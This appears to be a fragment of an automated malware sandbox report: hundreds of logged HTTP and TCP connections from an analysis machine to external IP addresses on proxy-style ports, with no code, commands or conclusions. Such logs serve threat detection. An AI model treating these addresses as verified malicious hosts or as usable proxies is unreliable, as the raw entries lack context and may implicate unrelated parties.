                Source: unknownNetwork traffic detected: HTTP traffic on port 51613 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51615 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 21011
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51336
                Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 31247
                Source: unknownNetwork traffic detected: HTTP traffic on port 51669 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51799 -> 6705
                Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51810 -> 13175
                Source: unknownNetwork traffic detected: HTTP traffic on port 51618 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51648 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 51507
                Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 10007
                Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 58714
                Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 27029
                Source: unknownNetwork traffic detected: HTTP traffic on port 51917 -> 30026
                Source: unknownNetwork traffic detected: HTTP traffic on port 51866 -> 53149
                Source: unknownNetwork traffic detected: HTTP traffic on port 51836 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 31147
                Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 44523
                Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 51840 -> 2411
                Source: unknownNetwork traffic detected: HTTP traffic on port 51862 -> 58037
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 51419
                Source: unknownNetwork traffic detected: HTTP traffic on port 51169 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 51608 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51870 -> 9827
                Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 44444
                Source: unknownNetwork traffic detected: HTTP traffic on port 51875 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51789 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51938 -> 31733
                Source: unknownNetwork traffic detected: HTTP traffic on port 51868 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51251 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51887 -> 4145
                Source: unknownNetwork traffic detected: IP country count 30
                Source: global trafficTCP traffic: 192.168.2.4:49734 -> 203.161.32.242:50640
                Source: global trafficTCP traffic: 192.168.2.4:49735 -> 103.141.66.78:8080
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 103.186.8.162:8080
                Source: global trafficTCP traffic: 192.168.2.4:49737 -> 91.187.55.39:5678
                Source: global trafficTCP traffic: 192.168.2.4:49738 -> 103.169.130.46:8080
                Source: global trafficTCP traffic: 192.168.2.4:49740 -> 45.11.95.165:5212
                Source: global trafficTCP traffic: 192.168.2.4:49741 -> 162.241.6.97:44607
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 45.77.111.135:15082
                Source: global trafficTCP traffic: 192.168.2.4:49743 -> 20.219.180.149:3129
                Source: global trafficTCP traffic: 192.168.2.4:49744 -> 160.248.80.91:587
                Source: global trafficTCP traffic: 192.168.2.4:49746 -> 154.72.90.74:8081
                Source: global trafficTCP traffic: 192.168.2.4:49747 -> 92.204.134.38:9375
                Source: global trafficTCP traffic: 192.168.2.4:49748 -> 72.167.222.113:48892
                Source: global trafficTCP traffic: 192.168.2.4:49749 -> 103.26.108.118:84
                Source: global trafficTCP traffic: 192.168.2.4:49750 -> 79.110.196.145:8081
                Source: global trafficTCP traffic: 192.168.2.4:49753 -> 152.32.78.24:4145
                Source: global trafficTCP traffic: 192.168.2.4:49754 -> 201.20.67.70:8080
                Source: global trafficTCP traffic: 192.168.2.4:49755 -> 47.91.110.154:1080
                Source: global trafficTCP traffic: 192.168.2.4:49756 -> 117.70.49.235:8089
                Source: global trafficTCP traffic: 192.168.2.4:49757 -> 162.241.70.64:49478
                Source: global trafficTCP traffic: 192.168.2.4:49758 -> 14.103.24.148:8000
                Source: global trafficTCP traffic: 192.168.2.4:49759 -> 207.180.234.220:37736
                Source: global trafficTCP traffic: 192.168.2.4:49760 -> 85.120.30.66:33590
                Source: global trafficTCP traffic: 192.168.2.4:49762 -> 142.54.237.34:4145
                Source: global trafficTCP traffic: 192.168.2.4:49763 -> 3.24.58.156:3128
                Source: global trafficTCP traffic: 192.168.2.4:49764 -> 43.133.136.208:8800
                Source: global trafficTCP traffic: 192.168.2.4:49765 -> 200.174.198.95:8888
                Source: global trafficTCP traffic: 192.168.2.4:49766 -> 45.56.220.210:59920
                Source: global trafficTCP traffic: 192.168.2.4:49767 -> 103.226.232.188:3125
                Source: global trafficTCP traffic: 192.168.2.4:49769 -> 116.97.240.147:4995
                Source: global trafficTCP traffic: 192.168.2.4:49770 -> 143.255.140.28:5678
                Source: global trafficTCP traffic: 192.168.2.4:49771 -> 113.53.3.242:8081
                Source: global trafficTCP traffic: 192.168.2.4:49772 -> 103.167.68.255:8080
                Source: global trafficTCP traffic: 192.168.2.4:49773 -> 122.152.53.25:5678
                Source: global trafficTCP traffic: 192.168.2.4:49774 -> 51.222.241.157:40351
                Source: global trafficTCP traffic: 192.168.2.4:49775 -> 72.10.160.90:30951
                Source: global trafficTCP traffic: 192.168.2.4:49776 -> 8.209.255.13:3128
                Source: global trafficTCP traffic: 192.168.2.4:49777 -> 162.214.90.49:58740
                Source: global trafficTCP traffic: 192.168.2.4:49778 -> 194.4.50.91:12334
                Source: global trafficTCP traffic: 192.168.2.4:49779 -> 103.199.155.18:6969
                Source: global trafficTCP traffic: 192.168.2.4:49781 -> 208.109.14.49:22881
                Source: global trafficTCP traffic: 192.168.2.4:49782 -> 91.213.119.246:31551
                Source: global trafficTCP traffic: 192.168.2.4:49783 -> 20.24.43.214:8123
                Source: global trafficTCP traffic: 192.168.2.4:49784 -> 178.212.51.79:5678
                Source: global trafficTCP traffic: 192.168.2.4:49785 -> 103.127.106.249:8090
                Source: global trafficTCP traffic: 192.168.2.4:49786 -> 185.108.141.19:8080
                Source: global trafficTCP traffic: 192.168.2.4:49787 -> 138.36.150.16:1080
                Source: global trafficTCP traffic: 192.168.2.4:49790 -> 67.43.228.252:4495
                Source: global trafficTCP traffic: 192.168.2.4:49791 -> 92.205.61.38:24183
                Source: global trafficTCP traffic: 192.168.2.4:49792 -> 162.243.102.207:9764
                Source: global trafficTCP traffic: 192.168.2.4:49794 -> 46.245.77.52:3128
                Source: global trafficTCP traffic: 192.168.2.4:49795 -> 45.229.10.98:8402
                Source: global trafficTCP traffic: 192.168.2.4:49796 -> 43.155.165.196:15673
                Source: global trafficTCP traffic: 192.168.2.4:49798 -> 20.37.207.8:8080
                Source: global trafficTCP traffic: 192.168.2.4:49799 -> 67.43.228.254:28971
                Source: global trafficTCP traffic: 192.168.2.4:49800 -> 162.241.50.179:37876
                Source: global trafficTCP traffic: 192.168.2.4:49802 -> 131.100.48.75:999
                Source: global trafficTCP traffic: 192.168.2.4:49803 -> 149.126.101.162:8080
                Source: global trafficTCP traffic: 192.168.2.4:49804 -> 51.81.89.146:50605
                Source: global trafficTCP traffic: 192.168.2.4:49805 -> 212.231.197.29:4145
                Source: global trafficTCP traffic: 192.168.2.4:49806 -> 42.200.196.208:8080
                Source: global trafficTCP traffic: 192.168.2.4:49808 -> 67.43.228.253:31033
                Source: global trafficTCP traffic: 192.168.2.4:49810 -> 186.248.87.172:5678
                Source: global trafficTCP traffic: 192.168.2.4:49812 -> 103.114.53.2:8080
                Source: global trafficTCP traffic: 192.168.2.4:49813 -> 64.227.108.25:31908
                Source: global trafficTCP traffic: 192.168.2.4:49814 -> 45.178.133.60:999
                Source: global trafficTCP traffic: 192.168.2.4:49816 -> 200.106.184.97:999
                Source: global trafficTCP traffic: 192.168.2.4:49817 -> 201.71.3.60:999
                Source: global trafficTCP traffic: 192.168.2.4:49818 -> 200.25.254.193:54240
                Source: global trafficTCP traffic: 192.168.2.4:49820 -> 114.231.45.101:8089
                Source: global trafficTCP traffic: 192.168.2.4:49822 -> 115.248.66.131:3129
                Source: global trafficTCP traffic: 192.168.2.4:49824 -> 171.244.140.160:37400
                Source: global trafficTCP traffic: 192.168.2.4:49825 -> 193.239.56.84:8081
                Source: global trafficTCP traffic: 192.168.2.4:49826 -> 14.207.41.71:8080
                Source: global trafficTCP traffic: 192.168.2.4:49827 -> 196.202.40.17:3128
                Source: global trafficTCP traffic: 192.168.2.4:49828 -> 185.82.87.30:1080
                Source: global trafficTCP traffic: 192.168.2.4:49829 -> 157.100.63.69:999
                Source: global trafficTCP traffic: 192.168.2.4:49830 -> 184.181.217.194:4145
                Source: global trafficTCP traffic: 192.168.2.4:49831 -> 188.124.15.13:3629
                Source: global trafficTCP traffic: 192.168.2.4:49833 -> 103.8.164.16:1111
                Source: global trafficTCP traffic: 192.168.2.4:49834 -> 193.106.57.96:5678
                Source: global trafficTCP traffic: 192.168.2.4:49836 -> 103.190.54.141:8080
                Source: global trafficTCP traffic: 192.168.2.4:49838 -> 115.127.112.74:8090
                Source: global trafficTCP traffic: 192.168.2.4:49839 -> 72.10.160.171:26315
                Source: global trafficTCP traffic: 192.168.2.4:49840 -> 193.239.86.249:3128
                Source: global trafficTCP traffic: 192.168.2.4:49841 -> 5.180.19.140:1080
                Source: global trafficTCP traffic: 192.168.2.4:49842 -> 45.181.123.145:999
                Source: global trafficTCP traffic: 192.168.2.4:49844 -> 193.34.21.200:8080
                Source: global trafficTCP traffic: 192.168.2.4:49845 -> 147.75.92.251:9401
                Source: global trafficTCP traffic: 192.168.2.4:49846 -> 15.236.106.236:3128
                Source: global trafficTCP traffic: 192.168.2.4:49847 -> 45.228.147.209:5678
                Source: global trafficTCP traffic: 192.168.2.4:49848 -> 93.171.243.253:1080
                Source: global trafficTCP traffic: 192.168.2.4:49849 -> 67.43.227.228:9039
                Source: global trafficTCP traffic: 192.168.2.4:49850 -> 123.108.98.108:5678
                Source: global trafficTCP traffic: 192.168.2.4:49851 -> 163.172.147.9:16379
                Source: global trafficTCP traffic: 192.168.2.4:49852 -> 220.248.70.237:9002
                Source: global trafficTCP traffic: 192.168.2.4:49853 -> 58.234.116.197:8197
                Source: global trafficTCP traffic: 192.168.2.4:49855 -> 92.204.135.37:55019
                Source: global trafficTCP traffic: 192.168.2.4:49857 -> 20.204.212.76:3129
                Source: global trafficTCP traffic: 192.168.2.4:49858 -> 155.50.241.99:3128
                Source: global trafficTCP traffic: 192.168.2.4:49861 -> 160.19.169.208:8080
                Source: global trafficTCP traffic: 192.168.2.4:49860 -> 5.252.23.220:1080
                Source: global trafficTCP traffic: 192.168.2.4:49862 -> 132.148.129.254:60781
                Source: global trafficTCP traffic: 192.168.2.4:49864 -> 123.182.58.221:8089
                Source: global trafficTCP traffic: 192.168.2.4:49865 -> 178.158.197.147:3629
                Source: global trafficTCP traffic: 192.168.2.4:49866 -> 178.128.207.96:18877
                Source: global trafficTCP traffic: 192.168.2.4:49867 -> 181.65.169.37:999
                Source: global trafficTCP traffic: 192.168.2.4:49868 -> 85.117.60.162:8080
                Source: global trafficTCP traffic: 192.168.2.4:49869 -> 5.44.42.115:58386
                Source: global trafficTCP traffic: 192.168.2.4:49870 -> 1.194.236.229:5005
                Source: global trafficTCP traffic: 192.168.2.4:49871 -> 98.162.25.29:31679
                Source: global trafficTCP traffic: 192.168.2.4:49872 -> 186.251.255.73:31337
                Source: global trafficTCP traffic: 192.168.2.4:49873 -> 174.64.199.82:4145
                Source: global trafficTCP traffic: 192.168.2.4:49874 -> 190.2.104.201:4153
                Source: global trafficTCP traffic: 192.168.2.4:49876 -> 181.212.45.228:8080
                Source: global trafficTCP traffic: 192.168.2.4:49877 -> 51.75.126.150:36694
                Source: global trafficTCP traffic: 192.168.2.4:49878 -> 176.88.166.218:8080
                Source: global trafficTCP traffic: 192.168.2.4:49879 -> 103.168.164.94:83
                Source: global trafficTCP traffic: 192.168.2.4:49880 -> 184.170.249.65:4145
                Source: global trafficTCP traffic: 192.168.2.4:49881 -> 179.1.192.27:999
                Source: global trafficTCP traffic: 192.168.2.4:49882 -> 51.81.186.179:51405
                Source: global trafficTCP traffic: 192.168.2.4:49883 -> 92.205.110.118:15430
                Source: global trafficTCP traffic: 192.168.2.4:49885 -> 105.174.40.54:8080
                Source: global trafficTCP traffic: 192.168.2.4:49886 -> 161.97.163.52:64120
                Source: global trafficTCP traffic: 192.168.2.4:49887 -> 45.190.78.50:999
                Source: global trafficTCP traffic: 192.168.2.4:49888 -> 168.228.36.22:27234
                Source: global trafficTCP traffic: 192.168.2.4:49889 -> 212.108.145.195:9090
                Source: global trafficTCP traffic: 192.168.2.4:49891 -> 88.202.230.103:17045
                Source: global trafficTCP traffic: 192.168.2.4:49892 -> 103.78.96.146:8181
                Source: global trafficTCP traffic: 192.168.2.4:49894 -> 87.76.1.251:8080
                Source: global trafficTCP traffic: 192.168.2.4:49895 -> 34.85.177.170:3128
                Source: global trafficTCP traffic: 192.168.2.4:49896 -> 103.234.26.163:9990
                Source: global trafficTCP traffic: 192.168.2.4:49897 -> 1.15.62.12:5678
                Source: global trafficTCP traffic: 192.168.2.4:49898 -> 160.16.90.35:3128
                Source: global trafficTCP traffic: 192.168.2.4:49901 -> 193.143.1.201:4444
                Source: global trafficTCP traffic: 192.168.2.4:49903 -> 176.119.227.65:5678
                Source: global trafficTCP traffic: 192.168.2.4:49904 -> 123.30.154.171:7777
                Source: global trafficTCP traffic: 192.168.2.4:49900 -> 18.134.236.231:3128
                Source: global trafficTCP traffic: 192.168.2.4:49905 -> 41.217.220.214:32650
                Source: global trafficTCP traffic: 192.168.2.4:49906 -> 178.128.156.219:8000
                Source: global trafficTCP traffic: 192.168.2.4:49907 -> 184.178.172.14:4145
                Source: global trafficTCP traffic: 192.168.2.4:49908 -> 51.15.254.129:16379
                Source: global trafficTCP traffic: 192.168.2.4:49909 -> 103.147.247.79:8080
                Source: global trafficTCP traffic: 192.168.2.4:49910 -> 94.131.106.196:3128
                Source: global trafficTCP traffic: 192.168.2.4:49914 -> 186.251.255.105:31337
                Source: global trafficTCP traffic: 192.168.2.4:49915 -> 89.187.216.58:1080
                Source: global trafficTCP traffic: 192.168.2.4:49916 -> 162.241.46.69:53783
                Source: global trafficTCP traffic: 192.168.2.4:49917 -> 95.47.149.8:8080
                Source: global trafficTCP traffic: 192.168.2.4:49918 -> 173.224.20.136:5678
                Source: global trafficTCP traffic: 192.168.2.4:49919 -> 173.212.250.16:64768
                Source: global trafficTCP traffic: 192.168.2.4:49920 -> 166.62.121.127:45248
                Source: global trafficTCP traffic: 192.168.2.4:49921 -> 119.28.60.64:8090
                Source: global trafficTCP traffic: 192.168.2.4:49922 -> 162.214.225.223:49806
                Source: global trafficTCP traffic: 192.168.2.4:49923 -> 103.153.232.41:8080
                Source: global trafficTCP traffic: 192.168.2.4:49924 -> 202.165.47.90:55443
                Source: global trafficTCP traffic: 192.168.2.4:49925 -> 103.169.254.186:8061
                Source: global trafficTCP traffic: 192.168.2.4:49926 -> 50.233.111.162:32100
                Source: global trafficTCP traffic: 192.168.2.4:49927 -> 65.109.152.88:8888
                Source: global trafficTCP traffic: 192.168.2.4:49928 -> 88.211.85.169:42931
                Source: global trafficTCP traffic: 192.168.2.4:49929 -> 104.238.111.107:5484
                Source: global trafficTCP traffic: 192.168.2.4:49930 -> 103.112.128.37:9091
                Source: global trafficTCP traffic: 192.168.2.4:49932 -> 194.182.187.78:3128
                Source: global trafficTCP traffic: 192.168.2.4:49933 -> 45.90.104.150:9090
                Source: global trafficTCP traffic: 192.168.2.4:49935 -> 46.0.203.186:8080
                Source: global trafficTCP traffic: 192.168.2.4:49938 -> 72.10.160.92:5775
                Source: global trafficTCP traffic: 192.168.2.4:49939 -> 41.33.203.115:1974
                Source: global trafficTCP traffic: 192.168.2.4:49940 -> 5.252.23.249:3128
                Source: global trafficTCP traffic: 192.168.2.4:49942 -> 37.187.77.58:10710
                Source: global trafficTCP traffic: 192.168.2.4:49945 -> 178.158.166.161:3128
                Source: global trafficTCP traffic: 192.168.2.4:49946 -> 92.247.12.136:9510
                Source: global trafficTCP traffic: 192.168.2.4:49950 -> 181.78.13.91:5678
                Source: global trafficTCP traffic: 192.168.2.4:49951 -> 57.128.163.242:8080
                Source: global trafficTCP traffic: 192.168.2.4:49952 -> 162.214.197.102:58740
                Source: global trafficTCP traffic: 192.168.2.4:49953 -> 211.222.252.187:8193
                Source: global trafficTCP traffic: 192.168.2.4:49955 -> 47.254.90.125:8888
                Source: global trafficTCP traffic: 192.168.2.4:49957 -> 43.131.245.216:15673
                Source: global trafficTCP traffic: 192.168.2.4:49959 -> 176.213.141.107:8080
                Source: global trafficTCP traffic: 192.168.2.4:49960 -> 148.72.209.174:12446
                Source: global trafficTCP traffic: 192.168.2.4:49961 -> 8.142.132.204:18080
                Source: global trafficTCP traffic: 192.168.2.4:49962 -> 94.124.16.218:8901
                Source: global trafficTCP traffic: 192.168.2.4:49963 -> 103.115.242.192:8080
                Source: global trafficTCP traffic: 192.168.2.4:49965 -> 41.65.236.56:1981
                Source: global trafficTCP traffic: 192.168.2.4:49967 -> 38.253.232.2:8080
                Source: global trafficTCP traffic: 192.168.2.4:49969 -> 36.90.61.224:4145
                Source: global trafficTCP traffic: 192.168.2.4:49971 -> 190.113.40.202:999
                Source: global trafficTCP traffic: 192.168.2.4:49972 -> 72.10.164.178:18067
                Source: global trafficTCP traffic: 192.168.2.4:49974 -> 103.234.27.153:1080
                Source: global trafficTCP traffic: 192.168.2.4:49975 -> 103.76.253.66:3129
                Source: global trafficTCP traffic: 192.168.2.4:49976 -> 38.156.73.54:8080
                Source: global trafficTCP traffic: 192.168.2.4:49978 -> 137.59.48.20:8080
                Source: global trafficTCP traffic: 192.168.2.4:49979 -> 178.245.145.234:3128
                Source: global trafficTCP traffic: 192.168.2.4:49981 -> 162.215.219.157:48117
                Source: global trafficTCP traffic: 192.168.2.4:49982 -> 170.239.205.1:999
                Source: global trafficTCP traffic: 192.168.2.4:49983 -> 51.89.173.40:55198
                Source: global trafficTCP traffic: 192.168.2.4:49985 -> 67.43.236.18:17145
                Source: global trafficTCP traffic: 192.168.2.4:49987 -> 36.255.104.1:13623
                Source: global trafficTCP traffic: 192.168.2.4:49988 -> 35.237.210.215:3128
                Source: global trafficTCP traffic: 192.168.2.4:49989 -> 51.15.242.202:8888
                Source: global trafficTCP traffic: 192.168.2.4:49990 -> 159.223.71.71:59243
                Source: global trafficTCP traffic: 192.168.2.4:49991 -> 41.128.148.76:1976
                Source: global trafficTCP traffic: 192.168.2.4:49992 -> 195.154.172.161:3128
                Source: global trafficTCP traffic: 192.168.2.4:49994 -> 38.156.72.135:8888
                Source: global trafficTCP traffic: 192.168.2.4:49995 -> 142.54.229.249:4145
                Source: global trafficTCP traffic: 192.168.2.4:49997 -> 85.94.24.29:1488
                Source: global trafficTCP traffic: 192.168.2.4:50000 -> 92.118.132.125:8080
                Source: global trafficTCP traffic: 192.168.2.4:50001 -> 107.180.88.173:59820
                Source: global trafficTCP traffic: 192.168.2.4:50003 -> 132.148.245.169:38117
                Source: global trafficTCP traffic: 192.168.2.4:50004 -> 67.43.227.226:25639
                Source: global trafficTCP traffic: 192.168.2.4:50005 -> 182.140.244.163:8118
                Source: global trafficTCP traffic: 192.168.2.4:50006 -> 202.142.167.210:1080
                Source: global trafficTCP traffic: 192.168.2.4:50007 -> 103.212.93.241:45639
                Source: global trafficTCP traffic: 192.168.2.4:50008 -> 163.172.171.22:16379
                Source: global trafficTCP traffic: 192.168.2.4:50011 -> 103.176.116.171:32650
                Source: global trafficTCP traffic: 192.168.2.4:50012 -> 125.99.106.250:3128
                Source: global trafficTCP traffic: 192.168.2.4:50013 -> 103.130.112.253:5678
                Source: global trafficTCP traffic: 192.168.2.4:50014 -> 167.172.109.12:37355
                Source: global trafficTCP traffic: 192.168.2.4:50015 -> 178.236.122.164:5678
                Source: global trafficTCP traffic: 192.168.2.4:50016 -> 147.75.34.86:10003
                Source: global trafficTCP traffic: 192.168.2.4:50017 -> 148.72.23.56:60069
                Source: global trafficTCP traffic: 192.168.2.4:50018 -> 120.37.121.209:9091
                Source: global trafficTCP traffic: 192.168.2.4:50020 -> 185.200.37.245:8080
                Source: global trafficTCP traffic: 192.168.2.4:50022 -> 163.172.165.36:16379
                Source: global trafficTCP traffic: 192.168.2.4:50023 -> 66.29.128.246:34350
                Source: global trafficTCP traffic: 192.168.2.4:50025 -> 51.178.43.147:3128
                Source: global trafficTCP traffic: 192.168.2.4:50027 -> 107.180.88.41:24834
                Source: global trafficTCP traffic: 192.168.2.4:50029 -> 191.103.219.225:48612
                Source: global trafficTCP traffic: 192.168.2.4:50030 -> 110.74.195.2:4153
                Source: global trafficTCP traffic: 192.168.2.4:50009 -> 190.97.238.89:999
                Source: global trafficTCP traffic: 192.168.2.4:50033 -> 178.128.148.69:3128
                Source: global trafficTCP traffic: 192.168.2.4:50036 -> 131.0.87.225:52017
                Source: global trafficTCP traffic: 192.168.2.4:50039 -> 95.164.89.123:8888
                Source: global trafficTCP traffic: 192.168.2.4:50040 -> 72.10.160.170:5385
                Source: global trafficTCP traffic: 192.168.2.4:50044 -> 139.255.132.68:1080
                Source: global trafficTCP traffic: 192.168.2.4:50045 -> 67.43.236.20:31295
                Source: global trafficTCP traffic: 192.168.2.4:50046 -> 59.92.70.176:3127
                Source: global trafficTCP traffic: 192.168.2.4:50048 -> 158.247.207.153:3030
                Source: global trafficTCP traffic: 192.168.2.4:50051 -> 111.8.155.54:7777
                Source: global trafficTCP traffic: 192.168.2.4:50052 -> 179.43.8.16:8088
                Source: global trafficTCP traffic: 192.168.2.4:50053 -> 51.158.64.130:16379
                Source: global trafficTCP traffic: 192.168.2.4:50054 -> 164.92.86.113:57391
                Source: global trafficTCP traffic: 192.168.2.4:50055 -> 200.52.148.10:999
                Source: global trafficTCP traffic: 192.168.2.4:50056 -> 195.154.43.184:19058
                Source: global trafficTCP traffic: 192.168.2.4:50057 -> 207.180.198.241:42581
                Source: global trafficTCP traffic: 192.168.2.4:50058 -> 103.231.248.98:3128
                Source: global trafficTCP traffic: 192.168.2.4:50059 -> 67.43.228.251:26087
                Source: global trafficTCP traffic: 192.168.2.4:50060 -> 103.159.46.2:83
                Source: global trafficTCP traffic: 192.168.2.4:50061 -> 62.171.131.101:25847
                Source: global trafficTCP traffic: 192.168.2.4:50063 -> 147.124.212.31:11070
                Source: global trafficTCP traffic: 192.168.2.4:50062 -> 137.184.200.42:8000
                Source: global trafficTCP traffic: 192.168.2.4:50065 -> 111.225.152.42:8089
                Source: global trafficTCP traffic: 192.168.2.4:50066 -> 51.15.142.4:16379
                Source: global trafficTCP traffic: 192.168.2.4:50068 -> 162.144.121.232:27262
                Source: global trafficTCP traffic: 192.168.2.4:50069 -> 113.100.209.184:3128
                Source: global trafficTCP traffic: 192.168.2.4:50071 -> 103.83.105.167:4153
                Source: global trafficTCP traffic: 192.168.2.4:50074 -> 167.249.29.218:999
                Source: global trafficTCP traffic: 192.168.2.4:50075 -> 167.86.102.169:16823
                Source: global trafficTCP traffic: 192.168.2.4:50076 -> 20.219.177.85:3129
                Source: global trafficTCP traffic: 192.168.2.4:50077 -> 14.103.24.20:8000
                Source: global trafficTCP traffic: 192.168.2.4:50078 -> 202.166.219.80:4153
                Source: global trafficTCP traffic: 192.168.2.4:50079 -> 81.19.3.249:10080
                Source: global trafficTCP traffic: 192.168.2.4:50081 -> 58.84.32.118:5678
                Source: global trafficTCP traffic: 192.168.2.4:50080 -> 45.11.95.166:6014
                Source: global trafficTCP traffic: 192.168.2.4:50082 -> 103.77.50.168:8080
                Source: global trafficTCP traffic: 192.168.2.4:50083 -> 74.62.179.122:8080
                Source: global trafficTCP traffic: 192.168.2.4:50084 -> 202.165.47.49:5678
                Source: global trafficTCP traffic: 192.168.2.4:50085 -> 174.64.199.79:4145
                Source: global trafficTCP traffic: 192.168.2.4:50086 -> 103.83.178.205:2016
                Source: global trafficTCP traffic: 192.168.2.4:50087 -> 162.214.191.209:58275
                Source: global trafficTCP traffic: 192.168.2.4:50089 -> 202.179.184.44:5430
                Source: global trafficTCP traffic: 192.168.2.4:50094 -> 94.186.234.236:8080
                Source: global trafficTCP traffic: 192.168.2.4:50095 -> 201.170.180.188:8080
                Source: global trafficTCP traffic: 192.168.2.4:50096 -> 223.25.98.82:5678
                Source: global trafficTCP traffic: 192.168.2.4:50097 -> 93.171.220.229:8888
                Source: global trafficTCP traffic: 192.168.2.4:50098 -> 98.64.169.17:8080
                Source: global trafficTCP traffic: 192.168.2.4:50099 -> 119.81.71.27:8123
                Source: global trafficTCP traffic: 192.168.2.4:50101 -> 86.110.189.118:42539
                Source: global trafficTCP traffic: 192.168.2.4:50102 -> 58.69.201.117:8082
                Source: global trafficTCP traffic: 192.168.2.4:50103 -> 77.242.24.241:8089
                Source: global trafficTCP traffic: 192.168.2.4:50104 -> 122.52.196.36:8080
                Source: global trafficTCP traffic: 192.168.2.4:50105 -> 49.228.131.169:5000
                Source: global trafficTCP traffic: 192.168.2.4:50106 -> 93.42.151.10:8080
                Source: global trafficTCP traffic: 192.168.2.4:50108 -> 87.255.200.108:60080
                Source: global trafficTCP traffic: 192.168.2.4:50109 -> 202.6.224.52:1080
                Source: global trafficTCP traffic: 192.168.2.4:50110 -> 197.211.244.135:5678
                Source: global trafficTCP traffic: 192.168.2.4:50113 -> 111.59.4.88:9002
                Source: global trafficTCP traffic: 192.168.2.4:50114 -> 148.66.130.53:56350
                Source: global trafficTCP traffic: 192.168.2.4:50115 -> 103.81.115.210:8080
                Source: global trafficTCP traffic: 192.168.2.4:50118 -> 186.24.9.114:999
                Source: global trafficTCP traffic: 192.168.2.4:50119 -> 117.202.20.69:1088
                Source: global trafficTCP traffic: 192.168.2.4:50120 -> 203.160.57.87:5678
                Source: global trafficTCP traffic: 192.168.2.4:50121 -> 51.158.108.134:16379
                Source: global trafficTCP traffic: 192.168.2.4:50122 -> 51.77.65.164:31979
                Source: global trafficTCP traffic: 192.168.2.4:50125 -> 67.213.212.50:40080
                Source: global trafficTCP traffic: 192.168.2.4:50126 -> 23.225.72.122:3500
                Source: global trafficTCP traffic: 192.168.2.4:50128 -> 146.59.18.246:40975
                Source: global trafficTCP traffic: 192.168.2.4:50127 -> 203.76.117.74:4153
                Source: global trafficTCP traffic: 192.168.2.4:50129 -> 66.228.140.209:8899
                Source: global trafficTCP traffic: 192.168.2.4:50130 -> 103.167.68.77:8080
                Source: global trafficTCP traffic: 192.168.2.4:50132 -> 159.112.141.44:8080
                Source: global trafficTCP traffic: 192.168.2.4:50133 -> 67.213.210.118:54924
                Source: global trafficTCP traffic: 192.168.2.4:50134 -> 115.221.242.131:9999
                Source: global trafficTCP traffic: 192.168.2.4:50135 -> 183.179.187.16:8080
                Source: global trafficTCP traffic: 192.168.2.4:50136 -> 81.12.104.43:3629
                Source: global trafficTCP traffic: 192.168.2.4:50137 -> 62.171.133.66:3128
                Source: global trafficTCP traffic: 192.168.2.4:50138 -> 138.0.143.128:8080
                Source: global trafficTCP traffic: 192.168.2.4:50139 -> 156.232.9.194:8080
                Source: global trafficTCP traffic: 192.168.2.4:50141 -> 155.50.213.149:3128
                Source: global trafficTCP traffic: 192.168.2.4:50143 -> 162.241.46.6:50062
                Source: global trafficTCP traffic: 192.168.2.4:50144 -> 64.124.145.1:1080
                Source: global trafficTCP traffic: 192.168.2.4:50151 -> 185.200.38.117:8080
                Source: global trafficTCP traffic: 192.168.2.4:50154 -> 45.134.80.222:3129
                Source: global trafficTCP traffic: 192.168.2.4:50155 -> 190.153.121.2:4145
                Source: global trafficTCP traffic: 192.168.2.4:50156 -> 103.182.112.11:8000
                Source: global trafficTCP traffic: 192.168.2.4:50157 -> 181.78.74.78:999
                Source: global trafficTCP traffic: 192.168.2.4:50158 -> 186.215.87.194:6022
                Source: global trafficTCP traffic: 192.168.2.4:50159 -> 5.58.33.187:55507
                Source: global trafficTCP traffic: 192.168.2.4:50146 -> 47.113.179.6:10705
                Source: global trafficTCP traffic: 192.168.2.4:50161 -> 218.6.120.111:7777
                Source: global trafficTCP traffic: 192.168.2.4:50162 -> 167.86.115.103:55066
                Source: global trafficTCP traffic: 192.168.2.4:50164 -> 161.97.173.78:26552
                Source: global trafficTCP traffic: 192.168.2.4:50167 -> 171.248.209.6:1080
                Source: global trafficTCP traffic: 192.168.2.4:50168 -> 177.234.194.226:999
                Source: global trafficTCP traffic: 192.168.2.4:50169 -> 169.255.198.8:5678
                Source: global trafficTCP traffic: 192.168.2.4:50170 -> 45.229.34.174:999
                Source: global trafficTCP traffic: 192.168.2.4:50172 -> 103.153.40.38:8080
                Source: global trafficTCP traffic: 192.168.2.4:50173 -> 64.44.139.12:20037
                Source: global trafficTCP traffic: 192.168.2.4:50174 -> 194.186.35.70:3128
                Source: global trafficTCP traffic: 192.168.2.4:50176 -> 173.212.237.43:63614
